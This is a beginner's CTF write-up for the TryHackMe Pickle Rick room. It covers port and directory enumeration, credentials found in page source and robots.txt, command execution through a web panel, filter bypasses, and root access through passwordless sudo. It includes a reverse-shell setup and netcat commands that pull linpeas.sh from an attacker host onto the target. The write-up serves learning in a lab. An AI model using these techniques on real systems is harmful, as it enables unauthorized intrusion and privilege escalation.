Pickle Rick CTF Writeup (Full and Detailed) — TryHackMe

This is a full walkthrough on how to beat the Pickle Rick CTF at TryHackMe. The objective of this writeup is to explain to the future me and to anyone else how I was able to solve this CTF and what tools I used.

General information

• Difficulty level: easy
• Platform: TryHackMe
• Vulnerabilities explored in this writeup: sensitive data exposure, command injection, privilege escalation through sudoers file.

Introduction

The Pickle Rick CTF is a TryHackMe vulnerable VM classified as “easy”. It’s based on the TV Series “Rick And Morty”, where in a episode Rick turns itself into a Pickle. In this CTF, Rick turned itself into a Pickle again, but this time he wasn’t able to go back to his human form, so we play as Morty, who needs to access Rick’s computer to gather information about 3 necessary ingredients (flags) to help Rick turn back to his human form.

Let’s go!

Enumeration with NMAP

First and more obvious thing, let’s do a enumeration with the IP we received from TryHackMe using NMAP. The target VM’s IP address, in my case, was 10.10.218.16.

sudo nmap <TARGET_IP> -A -T 4 -v -oN scan_results

NMAP scan command

• -A (Agressive Scan): enables “agressive scan mode”, which enables OS detection (-o), version detection (-sV), default script scanning (-sC) and traceroute (-traceroute);
• • -T 4 (“Agressive” Timing Template): NMAP has 6 timing templates (0–6, or paranoid-insane), which basically changes NMAP timings so we can avoid firewalls or IDS/IPS systems. Higher numbers are more faster but send more traffic, so they’re more likely to be detected by these technologies, but considering this is a simple CTF, the presence of firewalls or IDS/IPS systems is unlikeable;
• -v (Verbose): as the name suggests, it will enable the verbose mode, so we can see the NMAP results in real-time;
• -oN scan_results (Output Normal): this argument will send this scan results to a file called “scan_results”.

After the NMAP enumeration, our scan will bring these important informations:

NMAP scan results

• Port 22 is running a SSH service with OpenSSH 7.2p2, so we might need to exploit SSH to gain access to the machine;
• Port 80 is running a HTTP service with Apache 2.4.18, so we might need to exploit a web application to gather information or even get a web or upload a file to get a reverse shell;

Exploring the website

if we navigate to “http://<TARGET_IP>:80” we are gonna be greeted with this webpage that doesn’t tell us too much on how we should procced to get access to the machine. The only info we get is that we Rick doesn’t remember the password.

The default webpage (or the index.html file)

As this page doesn’t have any buttons or anything that could make us go to another page, let’s see if we can find any interesting infos in the page source code. We can see the page source code in Firefox by hitting “CTRL + U”, or by hitting “CTRL + ALT + I” to see the source code in the Inspector, or even by just right clicking anywhere on the page and choosing “View page source”.

Username commented in the index.html source code

There you go, we found a Sensitive Data Exposure vulnerability on the source code of this webpage that gives us a username of “R1ckRul3s”.

We can try navigating to the “/assets” path as well, as we found on the source code:

“/assets” path in the index.html source code

But unfortunately, if we navigate to “http://<TARGET_IP>:80/assets” we aren’t going to find any useful information, just a bunch of images, JQuerry files, etc.

“/assets” path files

Now we have a username, but still… even if we had a password, how should we login if we can’t find this functionality anywhere?

Let me tell you something in advance: no, we can’t use this username in the FTP service to make a brute-force attack. Actually, we can’t even make a connection to the FTP service, as we are going to get this message:

FTP connection refused error

So, if we can’t use this username in FTP, and we don’t have anywhere on the webpage to use it as well, how should we proceed? Well, maybe we need to do more enumeration on the web application! So, let’s try finding other directories and files on the web application that might be interesting to us.

Brute-forcing directories and files from the website

To find directories or files in a web application, we can use GoBuster to brute-force URIs. We could use another tool like “Nikto”, but we are just gonna be focusing on GoBuster, as this tool is able to get all the work done.

So, we are going to execute the following command on our shell:

gobuster dir -u <TARGET_URL> -x php,html,css,js,txt,pdf -w <WORDLIST>

GoBuster brute-force command

• dir: this option tells GoBuster we will brute-force for directories or files;
• -u (URL or Domain): the URL or Domain of the target we want to perform the brute-force;
• -x (File eXtensions): the file extensions we are looking for with the provided wordlist. We are looking for the most common ones, but we could provide way more extensions to GoBuster to find hidden files;
• -w (Wordlist): as the name suggests, the wordlist we will be using to brute-force. In this situation, we are using the “directory-list-2.3-medium.txt”.

This process will take a massive amount of time, as there are 220561 words to be brute-forced. So we will stop our brute-force earlier, just because we were able to gather more information that could help us procced to the next step.

GoBuster results

We can see we found 3 new files: login.php, portal.php and robots.txt. So, let’s navigate to then and see if we can find any interesting information.

In the “portal.php” (200 HTTP Status Code) webpage we are greeted with this login form. We already have a username, but no passwords. So, let’s just try to see if the other files we found gives us any insights about a password.

portal.php webpage

In the “portal.php” webpage we get redirected to the same “login.php” webpage (302 HTTP Status Code), so we can assume we will only have access to this “portal.php” once we have been successfully authenticated ourselves into the web application.

Finally, at the “robots.txt”, we get a very curious string saying “Wubbalubbadubdub”. This string is actually a very common quote from Rick. Maybe this is his password? Worth trying!

robots.txt

Going back to the “login.php” webpage and using “R1ckRul3s” as the username, and “Wubbalubbadubdub” as the password, we are able to make a successful login, making us able to have access to the “portal.php” webpage!

“login.php” login form with the username and the password

“portal.php” webpage

Using the website’s Command Panel

Now on this “portal.php” webpage we can see something that is gonna be extremely useful to us: a command panel. If you do a little bit of testing, you will see that this command panel basically accepts Linux commands, so it’s just like a web shell!

By the way, if we try to access any other tabs, we are always gonna end up in the “denied.php” webpage, that looks like this:

“denied.php” webpage

So, let’s input some Linux Command into that Command Panel to see what we can do.

Getting the first ingredient/flag

First, by inputting the command “ls -a” we can see all the files that are in the current folder we’re in:

There’s a file clearly popping off there called “Sup3rS3cretPickl3Ingred.txt”, let’s read what’s inside of it.

“cat Sup3rS3cretPickl3Ingred.txt” output

Well well, we just can’t use the “cat” command! So.. how are we gonna read what’s inside of this file? Actually there’s plenty ways of doing it, here’s a few commands that can replace “cat” in this situation:

• tac Sup3rS3cretPickl3Ingred.txt
• less Sup3rS3cretPickl3Ingred.txt
• strings Sup3rS3cretPickl3Ingred.txt
• grep . Sup3rS3cretPickl3Ingred.txt
• cp Sup3rS3cretPickl3Ingred.txt /dev/stdout
• while read line; do echo $line; done < Sup3rS3cretPickl3Ingred.txt

So, by using of the commands above we can find the 1st ingredient that Rick needs:

1st flag

There we go! First flag done!

Is worth mentioning that not only the “cat” command is disabled, but the “head”, “more”, “tail”, “nano”, “vim” and “vi” are disabled as well. How do I know this? Try using the same command above, but this time specify the file “portal.php”, then hit “CTRL + U” to see the source code:

“portal.php” file content

Yes, it’s a little messy, but if we organize this a little bit we are gonna be able to clearly read all the PHP logic inside the “portal.php” file (which is where we are inputting our commands).

Getting the second ingredient/flag

Now, if we go back, we can see that there is another .txt file popping out in the “ls -a” command output. If we read that .txt file content just like we did with the “Sup3rS3cretPickl3Ingred.txt” or the “portal.php”, we gonna have the following output:

“clue.txt” output

Pretty straight foward. I usually start checking the “/home/” directory, so let’s see if we can find more clues or important information there.

“/home/” contents

As we can see, by inputting the “ls -al” command in the “/home/” directory, we found a home directory from “rick”! By listing the contents inside this directory, we can actually found another file with a very flashy name of “second ingredients”:

“/home/rick/” contents

And so, by reading the contents of this file with “tac /home/rick/second\ ingredients” we get the 2nd ingredient Rick needs!

2nd flag

Be aware of the backslash after the word “second”, this is a special character that allow us to, in this case, use a space. If we don’t use the backslash, the command won’t work, or we will need to put the full file path in quotes (tac “/home/rick/second ingredients”). The way you do is up to you.

Getting the third ingredient/flag

Now there’s only one ingredient/flag remaining, but we don’t have any clues where it is, so we can assume it’s the “root flag”, which will demand us to escalate privileges to become the root user.

If we type the command “whoami” in the Command Panel, we will see that we are “www-data” at the moment, and this user can’t access the “/root/” directory.

“whoami” output

To root ourselves, I am going to explain two different approaches we can take: the simple and the sweaty one.

Escalating privileges: simple way

The simple method is… well… simple. If we type on the Command Panel “sudo -l” we are gonna get a output from the “/etc/sudoers” file, and there is an entry that specifically talks about our “www-data” user, and this entry is basically saying that the “www-data” user can execute any commands in the system as the root user without providing any password”.

Well, if we can execute any command as the root without providing the root password, why won’t we just execute what we want with the “sudo” prefix evey time? This is what we’re gonna do!

So, by listing all the content from the “/root/” directory with the “sudo” prefix, we can see a list of files, which one of then has a very peculiar name of “3rd.txt”.

“sudo ls -al /root/” output

There we go! This is the 3rd ingredient/flag, let’s read what’s inside the “3rd.txt” file:

3rd flag

The CTF is already done, but let’s see how we would try to find privilege escalation vulnerabilities.

Escalating privileges: sweaty way

The sweaty method is more complex but it still a very simple and easy way to escalate our privileges. We just gonna get a reverse shell with a python script to work, and then run a shell script called “linpeas.sh” to enumerate possible privilege escalation vulnerabilities inside the target machine.

So, let’s start!

First we need a reverse shell, let’s see if the target machine has Python or Python3 installed:

“which python3” output

As we can see, the target machine has Python3 installed, so we can try using a Python reverse shell script.

We can find a Python reverse shell in the well know “Reverse Shell Cheat Sheet from pentestmonkey”, if we scroll a little bit we’re gonna see this script:

Python reverse shell script

So, just copy the script and change the IP “10.0.0.1” to your TryHackMe VPN tun0 interface IP address.

Now, we are going to use Netcat on our machine and listen on the port “1234”:

nc -lvnp 1234

“nc -vlnp 1234" output

Now we are going to go back to the “portal.php” page, and input the Python reverse shell script there.

Python reverse shell script on the Command Panel

After executing the command, we will have a working reverse shell!

Reverse shell working

Before uploading our file to the server and enumerating privilege escalation possibilities, let’s make our shell a little bit better by running the following python code:

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Python code to make the shell better

Now that we have a more Ok reverse shell, let’s download “linpeas.sh” script to our machine, and then use Netcat to transfer this script from our machine to the target machine.

To do so, first we need to navigate to the folder our “linpeas.sh” script is, and then the type following command on our machine:

nc -q 0 -lnvp <PORT> < linpeas.sh

Netcat command on our machine

Be aware that the ATTACKING_IP is our TryHackMe VPN IP address, not anything else. So, go to the reverse shell and type the following command:

nc <ATTACKING_IP> <PORT> > /tmp/lin/linpeas.sh

Netcat command on target machine

This command will download the “linpeas.sh” we put on listen in the desired port with Netcat. Now just run “ls -l /tmp” to make sure our “linpeas.sh” file is present there:

“ls -l /tmp” output

As we can see, our “linpeas.sh” file now it’s on the target machine. To run the script, first make sure you have execute permissions. By looking at the permissions in the “ls -l” output, we clearly don’t have execute permissions (-rw-r--r--), so let’s just simply type “chmod +x linpeas.sh” (-rwxr-xr-x).

After that, just type “./linpeas.sh” to run the script. We will get a long list telling us a lot about privilege escalation on the system, but what really matters to us is this snippet over here:

linpeas.sh output snippet

This is where we get the information that the user “www-data” is able to execute all commands as sudo without providing a password, just like we did with the “simple way” above.

Now, we just need to repeat what we did on the “simple way” to get our 3rd and last ingredient/flag, but as we are not blocked by any filters from the “portal.php” file, we can use, for example, the “cat” command over here on the reverse shell:

3rd flag

Conclusion

That’s it! The CTF is done!

We successfully helped Rick turn back to human by hacking into his machine and getting all the three necessary ingredients.

This is a easy level CTF that definitely helps new cybersecurity students to get into how CTFs works. Me myself am a beginner at cybersecurity and pentesting, I had to think a little bit and try different things to make sure I could get all the three flags, that’s why these CTFs helps us learn a lot, we need to test and try different things, which sometimes doesn’t result in anything in a particular CTF, but still, we end up learning how to do something new, that can help us in other CTFs or even in specific future situations.

This was my first post about cybersecurity, as well as my first post on Medium. If you enjoyed, leave it a clap and comment you thoughts or questions about it.

Thanks!

External Links

• TryHackMe Pickle Rick room: https://tryhackme.com/room/picklerick
• directory-list-2.3-medium.txt: https://github.com/danielmiessler/SecLists/raw/master/Discovery/Web-Content/directory-list-2.3-medium.txt
• Reverse Shell Cheat Sheet from pentestmonkey: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
• linpeas.sh: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh